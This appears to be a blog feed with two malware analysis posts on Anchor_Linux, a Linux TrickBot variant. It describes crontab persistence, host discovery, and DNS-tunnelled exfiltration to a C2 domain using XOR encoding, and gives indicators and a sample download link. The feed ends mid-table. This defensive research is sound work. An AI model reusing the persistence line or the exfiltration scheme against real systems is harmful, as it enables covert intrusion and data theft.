bizarrechaos A linux-themed Jekyll site https://bizarrechaos.com/ Sat, 03 Sep 2022 20:09:53 +0000 Sat, 03 Sep 2022 20:09:53 +0000 Jekyll v3.9.2 Malware Code Analysis: Anchor_Linux <h1 id="overview">Overview</h1> <p>In my last post I analysed Anchor_Linux.<br /> I want to get a bit deeper into the actual code of this binary and try and find where the things we saw are happening.</p> <h1 id="analysis-summary">Analysis Summary</h1> <p>To get started with analyzing this code I fired up (ghidra)[https://ghidra-sre.org/], created a new project, added the binary and double clicked it to start analysis.</p> <p>To start off I used the string search to look for <code class="language-plaintext highlighter-rouge">/etc/crontab</code>. I found the function containing the reference to <code class="language-plaintext highlighter-rouge">/etc/crontab</code> as well as the cronjob string itself.</p> <p><img src="https://bizarrechaos.com/attachments/c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc/install_crontab.png" alt="" /></p> <p>I then followed the function references up and found the function that runs install_crontab function and the get_processes function.</p> <p><img src="https://bizarrechaos.com/attachments/c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc/discovery_and_persistence.png" alt="" /></p> <p>In get_processes we see functions to get all of the processes from <code class="language-plaintext highlighter-rouge">/proc</code>.<br /> We then see a function that takes those processes and prints the <code class="language-plaintext highlighter-rouge">/proc/$PID/cmdline</code>.</p> <p><img src="https://bizarrechaos.com/attachments/c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc/get_processes.png" alt="" /></p> <p><img src="https://bizarrechaos.com/attachments/c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc/get_proc.png" alt="" /></p> <p><img src="https://bizarrechaos.com/attachments/c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc/get_proc_cli.png" alt="" /></p> <p>Following the references to the discovery_and_persistence function we get to the main function.<br /> In this main function we see a lot of debug information left in by the bad actors, as well as logging functionality. It seems this malware is actively being developed.</p> <p><img src="https://bizarrechaos.com/attachments/c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc/main_debug_log.png" alt="" /></p> <p>Further down in the main function the process forks.</p> <p><img src="https://bizarrechaos.com/attachments/c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc/fork.png" alt="" /></p> <p>This is the section where we start to see the Anchor_DNS code.<br /> Digging into this function we get to a function that is building the Anchor_DNS string we saw in our previous analysis. <code class="language-plaintext highlighter-rouge">/anchor_linux/hostname_version/.client_id/#/LVER/1001/public_ip/payload</code></p> <p><img src="https://bizarrechaos.com/attachments/c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc/host_string.png" alt="" /></p> <p>This function builds this string piece by piece, which isn’t surprising when we see that the function that gets the hosts public IP is called from here.</p> <p><img src="https://bizarrechaos.com/attachments/c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc/public_ip.png" alt="" /></p> <p>Once the string is built it then gets sent off to a function that builds and makes the DNS request to send this data out.</p> <p>Furthermore we can see in the codes strings and hexdump where all these urls are.</p> <p><img src="https://bizarrechaos.com/attachments/c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc/url_strings.png" alt="" /></p> <p><img src="https://bizarrechaos.com/attachments/c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc/hexdump_ip_urls.png" alt="" /></p> <p>I also looked for the smb reference that we saw in the strings from our previous analysis and found the following.</p> <p><img src="https://bizarrechaos.com/attachments/c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc/smb.png" alt="" /></p> <p>There appears to be functionality for smb, ftp, and numerous connectivity methods built into this malware. However at this time it does not appear that they are being used actively. In the future, this will more than likely be used for network discovery and lateral movement that can be done cross platform using Linux and Windows malware variants.</p> Fri, 07 Aug 2020 23:00:00 +0000 https://bizarrechaos.com/posts/Malware-Code-Analysis-Anchor_Linux/ https://bizarrechaos.com/posts/Malware-Code-Analysis-Anchor_Linux/ malware_analysis re posts Malware Analysis: Anchor_Linux <h1 id="disclaimer">Disclaimer</h1> <p>The following is a Malware analysis report for the binary with SHA-256 hash c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc.<br /> The binary can be downloaded from <a href="https://malshare.com/sample.php?action=detail&amp;hash=7d2595904aa6feb46b3e8f3262963042">MalShare</a><br /> I take no responsibility for any actions you take based on this report.<br /> Use caution when downloading and executing malware.<br /> Use a virtual machine, be safe, have fun.</p> <h1 id="opinions">Opinions</h1> <p>In my last post I took a look at TrickBot malware. This post will focus on Anchor_Linux, otherwise known as TrickBot for Linux.</p> <p>As we will see in the analysis this sample functions very similarly to TrickBot on Windows, and utilizes Anchor_DNS as the C2 infrastructure.<br /> This means that both this Linux malware and newer TrickBot variants on Windows can use the same C2 infrastructure.</p> <p>As I mentioned in my last post TrickBot will continue to evolve until it is no longer profitable.<br /> Right now one of the biggest ways to turn a profit for these bad actors is crypto currency mining.<br /> While mining from a single machine is not very profitable, if you are able to distribute the mining to several hundred or thousand machines, especially ones you do not have to worry about the over head on, it can become rather profitable.<br /> Linux is by far the most popular OS for servers on the internet, it was only a matter of time before we saw this evolution.</p> <p>I only ran this sample for a short period so I did not see a stage two payload, only the initial discovery and beaconing.</p> <h1 id="analysis-summary">Analysis Summary</h1> <p>When executed this malware immediately appends a line to <code class="language-plaintext highlighter-rouge">/etc/crontab</code> to setup persistence.<br /> This line ensures the malware is ran every minute.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>*/1 ** * *root/home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042 </code></pre></div></div> <p>Once persistence is setup the malware executes <code class="language-plaintext highlighter-rouge">uname</code> to gather host details, as well as reads all <code class="language-plaintext highlighter-rouge">/proc/$PID/cmdline</code> files to gather info on all running processes.<br /> A web request is made to an external site to gather the hosts external IP address.<br /> In the strings we saw that there are several http and https options available.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://checkip.amazonaws.com http://ipecho.net/plain http://ipinfo.io/ip http://api.ipify.org http://icanhazip.com http://myexternalip.com/raw http://wtfismyip.com/text http://ip.anysrc.net/plain/clientip https://checkip.amazonaws.com https://ipecho.net/plain https://ipinfo.io/ip https://api.ipify.org https://icanhazip.com https://myexternalip.com/raw https://wtfismyip.com/text https://ip.anysrc.net/plain/clientip </code></pre></div></div> <p>Based on what we saw in the pcap it seems that the list of sites is likely iterated over until a result is returned.<br /> In this case the first request returned a result, and no further requests were made.</p> <p>Once the Discovery portion is complete the malware compiles the data in a format known to the Anchor_DNS C2 infrastructure.<br /> The format is <code class="language-plaintext highlighter-rouge">/anchor_linux/hostname_version/.client_id/#/LVER/1001/public_ip/payload</code>, which is then xor’d with 0xb9 and hex encoded.</p> <p>As we see in the pcap, packet 20 looks like this:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>20 9.602723 192.168.1.101 → 192.168.1.1 DNS 314 Standard query 0x1916 A 898A926AB2D9AFF7CD2FFB3BE8A8A0545BB9BA96D8D7DAD1D6CBE6D5D0D7CCC.196CBDCD4D7CCC1E6F58D888C89888888978F8EFBFF8F81FD80FDFD89FF8DFD.8E8B808B898DFF88FB8EFB8D8AF8F8F888FF968996F58D888C8988888896888.989889688898E97888C8197888C97888896FF81.biillpi.com OPT </code></pre></div></div> <p>A DNS query for <code class="language-plaintext highlighter-rouge">some_long_string.biillpi.com</code>.<br /> If we take everything before .biilpi[.]com, remove the ‘.’s, hex decode it, and xor it with a key of 0xb9 we get the following:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>03+Ó.`.Nt.B.Q..íâ../anchor_linux/remnux_L4150111.67BF68D9DD0F4D729204F1B7B43AAA1F/0/L4150111/1001/107.158.15.11/F8 </code></pre></div></div> <p>Once this initial discovery and exfiltration phase is complete the malware will continue to beacon using the Anchor_DNS framework.<br /> Any proceeding payloads will be provided as answers to the queries.<br /> In this run we did not see a stage two, or any subsequent payload delivery.</p> <p>Based upon the strings we can also see that this malware has smb capabilities.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>smb:// URL does not start with 'smb://' </code></pre></div></div> <p>Revealing the cross-platorm-ness that this malware is intending to reach.</p> <h1 id="environment-and-tools">Environment and tools</h1> <ul> <li><a href="https://remnux.org/">remnux</a></li> <li><a href="https://en.wikipedia.org/wiki/GNU_Binutils">binutils</a></li> <li><a href="https://www.pfsense.org/">pFsense</a></li> <li><a href="https://www.tcpdump.org/">tcpdump</a></li> <li><a href="https://sysdig.com/">sysdig</a></li> <li><a href="https://github.com/brimsec">brim</a></li> <li><a href="https://gchq.github.io/CyberChef/">cyberchef</a></li> </ul> <hr /> <h1 id="static-analysis">Static Analysis</h1> <table> <thead> <tr> <th style="text-align: left">Data</th> <th style="text-align: left">Value</th> </tr> </thead> <tbody> <tr> <td style="text-align: left">File Type</td> <td style="text-align: left">ELF</td> </tr> <tr> <td style="text-align: left">Magic</td> <td style="text-align: left">ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, stripped</td> </tr> <tr> <td style="text-align: left">File Size</td> <td style="text-align: left">782424 bytes</td> </tr> <tr> <td style="text-align: left">MD5</td> <td style="text-align: left">7d2595904aa6feb46b3e8f3262963042</td> </tr> <tr> <td style="text-align: left">SHA1</td> <td style="text-align: left">32f485eece997ee331809e98495641f2bddf8b3f</td> </tr> <tr> <td style="text-align: left">SHA256</td> <td style="text-align: left">c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc</td> </tr> <tr> <td style="text-align: left">SHA512</td> <td style="text-align: left">77b36c4a46ae236b0e0bf5b839239b742e437d9d1990408165be0096defd6562976a0c4158fd2c9cd61287b785ecb178864ca379437e1304d6664593ca1115c5</td> </tr> <tr> <td style="text-align: left">SSDEEP</td> <td style="text-align: left">12288:Y4BABjvg6LhrRQNCU48lIOmEt/csWpD361AqRNZGO/1Tkvxq:YPLhx8lIOmmUbAAqRNI</td> </tr> <tr> <td style="text-align: left">Entry Point</td> <td style="text-align: left">0x404620</td> </tr> </tbody> </table> <h2 id="sections">Sections</h2> <table> <thead> <tr> <th style="text-align: left">Name</th> <th style="text-align: left">Address</th> <th style="text-align: left">Size</th> <th style="text-align: left">Offset</th> <th style="text-align: left">Type</th> <th style="text-align: left">Flags</th> </tr> </thead> <tbody> <tr> <td style="text-align: left">-</td> <td style="text-align: left">0x0</td> <td style="text-align: left">0x0</td> <td style="text-align: left">0x0</td> <td style="text-align: left">NULL</td> <td style="text-align: left">-</td> </tr> <tr> <td style="text-align: left">.interp</td> <td style="text-align: left">0x400270</td> <td style="text-align: left">0x1c</td> <td style="text-align: left">0x270</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">A</td> </tr> <tr> <td style="text-align: left">.note.ABI-tag</td> <td style="text-align: left">0x40028c</td> <td style="text-align: left">0x20</td> <td style="text-align: left">0x28c</td> <td style="text-align: left">NOTE</td> <td style="text-align: left">A</td> </tr> <tr> <td style="text-align: left">.hash</td> <td style="text-align: left">0x4002b0</td> <td style="text-align: left">0x48c</td> <td style="text-align: left">0x2b0</td> <td style="text-align: left">HASH</td> <td style="text-align: left">A</td> </tr> <tr> <td style="text-align: left">.dynsym</td> <td style="text-align: left">0x400740</td> <td style="text-align: left">0xed0</td> <td style="text-align: left">0x740</td> <td style="text-align: left">DYNSYM</td> <td style="text-align: left">A</td> </tr> <tr> <td style="text-align: left">.dynstr</td> <td style="text-align: left">0x401610</td> <td style="text-align: left">0x5e7</td> <td style="text-align: left">0x1610</td> <td style="text-align: left">STRTAB</td> <td style="text-align: left">A</td> </tr> <tr> <td style="text-align: left">.gnu.version</td> <td style="text-align: left">0x401bf8</td> <td style="text-align: left">0x13c</td> <td style="text-align: left">0x1bf8</td> <td style="text-align: left">GNU_versym</td> <td style="text-align: left">A</td> </tr> <tr> <td style="text-align: left">.gnu.version_r</td> <td style="text-align: left">0x401d38</td> <td style="text-align: left">0xd0</td> <td style="text-align: left">0x1d38</td> <td style="text-align: left">GNU_verneed</td> <td style="text-align: left">A</td> </tr> <tr> <td style="text-align: left">.rela.dyn</td> <td style="text-align: left">0x401e08</td> <td style="text-align: left">0x180</td> <td style="text-align: left">0x1e08</td> <td style="text-align: left">RELA</td> <td style="text-align: left">A</td> </tr> <tr> <td style="text-align: left">.rela.plt</td> <td style="text-align: left">0x401f88</td> <td style="text-align: left">0xdb0</td> <td style="text-align: left">0x1f88</td> <td style="text-align: left">RELA</td> <td style="text-align: left">AI</td> </tr> <tr> <td style="text-align: left">.init</td> <td style="text-align: left">0x402d38</td> <td style="text-align: left">0x17</td> <td style="text-align: left">0x2d38</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">AX</td> </tr> <tr> <td style="text-align: left">.plt</td> <td style="text-align: left">0x402d50</td> <td style="text-align: left">0x930</td> <td style="text-align: left">0x2d50</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">AX</td> </tr> <tr> <td style="text-align: left">.plt.got</td> <td style="text-align: left">0x403680</td> <td style="text-align: left">0x20</td> <td style="text-align: left">0x3680</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">AX</td> </tr> <tr> <td style="text-align: left">.text</td> <td style="text-align: left">0x4036a0</td> <td style="text-align: left">0x70f32</td> <td style="text-align: left">0x36a0</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">AX</td> </tr> <tr> <td style="text-align: left">.fini</td> <td style="text-align: left">0x4745d4</td> <td style="text-align: left">0x9</td> <td style="text-align: left">0x745d4</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">AX</td> </tr> <tr> <td style="text-align: left">.rodata</td> <td style="text-align: left">0x4745e0</td> <td style="text-align: left">0x2d200</td> <td style="text-align: left">0x745e0</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">A</td> </tr> <tr> <td style="text-align: left">.eh_frame_hdr</td> <td style="text-align: left">0x4a17e0</td> <td style="text-align: left">0x3c14</td> <td style="text-align: left">0xa17e0</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">A</td> </tr> <tr> <td style="text-align: left">.eh_frame</td> <td style="text-align: left">0x4a53f8</td> <td style="text-align: left">0x15594</td> <td style="text-align: left">0xa53f8</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">A</td> </tr> <tr> <td style="text-align: left">.gcc_except_table</td> <td style="text-align: left">0x4ba98c</td> <td style="text-align: left">0x6cd</td> <td style="text-align: left">0xba98c</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">A</td> </tr> <tr> <td style="text-align: left">.tdata</td> <td style="text-align: left">0x6bbb78</td> <td style="text-align: left">0x4</td> <td style="text-align: left">0xbbb78</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">WAT</td> </tr> <tr> <td style="text-align: left">.tbss</td> <td style="text-align: left">0x6bbb80</td> <td style="text-align: left">0x58</td> <td style="text-align: left">0xbbb7c</td> <td style="text-align: left">NOBITS</td> <td style="text-align: left">WAT</td> </tr> <tr> <td style="text-align: left">.init_array</td> <td style="text-align: left">0x6bbb80</td> <td style="text-align: left">0x18</td> <td style="text-align: left">0xbbb80</td> <td style="text-align: left">INIT_ARRAY</td> <td style="text-align: left">WA</td> </tr> <tr> <td style="text-align: left">.fini_array</td> <td style="text-align: left">0x6bbb98</td> <td style="text-align: left">0x8</td> <td style="text-align: left">0xbbb98</td> <td style="text-align: left">FINI_ARRAY</td> <td style="text-align: left">WA</td> </tr> <tr> <td style="text-align: left">.data.rel.ro</td> <td style="text-align: left">0x6bbba0</td> <td style="text-align: left">0x21b8</td> <td style="text-align: left">0xbbba0</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">WA</td> </tr> <tr> <td style="text-align: left">.dynamic</td> <td style="text-align: left">0x6bdd58</td> <td style="text-align: left">0x210</td> <td style="text-align: left">0xbdd58</td> <td style="text-align: left">DYNAMIC</td> <td style="text-align: left">WA</td> </tr> <tr> <td style="text-align: left">.got</td> <td style="text-align: left">0x6bdf68</td> <td style="text-align: left">0x88</td> <td style="text-align: left">0xbdf68</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">WA</td> </tr> <tr> <td style="text-align: left">.got.plt</td> <td style="text-align: left">0x6be000</td> <td style="text-align: left">0x4a8</td> <td style="text-align: left">0xbe000</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">WA</td> </tr> <tr> <td style="text-align: left">.data</td> <td style="text-align: left">0x6be4c0</td> <td style="text-align: left">0x288</td> <td style="text-align: left">0xbe4c0</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">WA</td> </tr> <tr> <td style="text-align: left">.bss</td> <td style="text-align: left">0x6be760</td> <td style="text-align: left">0x1a28</td> <td style="text-align: left">0xbe748</td> <td style="text-align: left">NOBITS</td> <td style="text-align: left">WA</td> </tr> <tr> <td style="text-align: left">.comment</td> <td style="text-align: left">0x0</td> <td style="text-align: left">0x3e</td> <td style="text-align: left">0xbe748</td> <td style="text-align: left">PROGBITS</td> <td style="text-align: left">MS</td> </tr> <tr> <td style="text-align: left">.shstrtab</td> <td style="text-align: left">0x0</td> <td style="text-align: left">0x10c</td> <td style="text-align: left">0xbe786</td> <td style="text-align: left">STRTAB</td> <td style="text-align: left">-</td> </tr> </tbody> </table> <h2 id="symbols">Symbols</h2> <table> <thead> <tr> <th style="text-align: left">Type</th> <th style="text-align: left">Bind</th> <th style="text-align: left">Vis</th> <th style="text-align: left">Ndx</th> <th style="text-align: left">Name</th> </tr> </thead> <tbody> <tr> <td style="text-align: left">NOTYPE</td> <td style="text-align: left">LOCAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left"> </td> </tr> <tr> <td style="text-align: left">NOTYPE</td> <td style="text-align: left">WEAK</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">_ZGTtnam</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">inet_ntop@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">getenv@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">dl_iterate_phdr@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">free@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">recv@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">pthread_create@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">pthread_detach@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">abort@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">__errno_location@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">srandom@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">unlink@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strncpy@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strncmp@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">OBJECT</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">stdout@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strcpy@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">writev@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">islower@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">toupper@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">qsort@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fread@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">OBJECT</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">stdin@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">vsnprintf@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">setsockopt@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">__xpg_strerror_r@GLIBC_2.3.4 (4)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fcntl@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">write@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">getpid@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">NOTYPE</td> <td style="text-align: left">WEAK</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">_ITM_RU1</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">getpeername@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">WEAK</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">pthread_once@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fclose@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">opendir@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">WEAK</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">__pthread_key_create@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">dcgettext@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strlen@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">getpwuid_r@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">chdir@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">__stack_chk_fail@GLIBC_2.4 (5)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">getuid@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">system@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">send@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strchr@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">fgetpos@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">rewind@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">pthread_mutex_destroy@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">snprintf@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">nanosleep@GLIBC_2.2.5 (3)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">strrchr@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">ftruncate@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">uname@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">gmtime_r@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">dup@GLIBC_2.2.5 (2)</td> </tr> <tr> <td style="text-align: left">FUNC</td> <td style="text-align: left">GLOBAL</td> <td style="text-align: left">DEFAULT</td> <td style="text-align: left">UND</td> <td style="text-align: left">lseek@GLIBC_2.2.5 (3)</td> </tr> <tr> <td 